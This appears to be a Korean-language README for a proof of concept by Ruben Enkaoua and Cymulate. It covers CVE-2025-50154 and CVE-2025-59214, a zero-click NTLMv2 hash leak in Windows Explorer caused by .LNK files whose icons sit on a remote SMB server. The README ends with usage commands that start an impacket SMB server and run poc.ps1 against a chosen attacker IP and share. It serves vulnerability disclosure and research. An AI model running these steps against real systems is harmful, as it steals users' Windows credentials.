
CVE-2025-50154 및 CVE-2025-59214에 대한 POC로, Windows 파일 탐색기에서 사용자 상호작용 없이 NTLMv2-SSP를 노출시키는 제로데이 취약점입니다. CVE-2025-24054 보안 패치에 대한 우회입니다.
작성자: Ruben Enkaoua 및 Cymulate
첫 번째 블로그: 제로 클릭, 하나의 NTLM: Microsoft 보안 패치 우회 (CVE-2025-50154)
두 번째 블로그: 두 번 패치, 여전히 우회됨: 새로운 NTLM 유출 (CVE-2025-50154 패치 우회)
최근 패치된 원래 취약점은 explorer.exe가 원격 SMB 서버에 호스팅된 아이콘을 가진 .LNK 바로가기 파일의 아이콘을 렌더링할 때 트리거되는 0-클릭 NTLM 해시 노출이었습니다.
패치 이후 explorer.exe는 더 이상 원격 SMB 경로에서 아이콘을 로드하지 않으므로 NTLM 해시의 자동 노출이 방지됩니다.
업데이트: CVE-2025-50154에 대한 패치는 전혀 작동하지 않았습니다. 이를 신고했고, 해당 취약점에 새로운 CVE인 CVE-2025-59214가 할당되었습니다. POC는 두 CVE 모두에 적용됩니다.
다음과 같은 .LNK 파일을 제작함으로써:
explorer.exe 프로세스는 여전히 원격 파일을 가져와 해당 RT_GROUP_ICON 및 RT_ICON 리소스에서 PE 아이콘을 추출합니다.

# put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
impacket-smbserver share . -smb2support
# Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"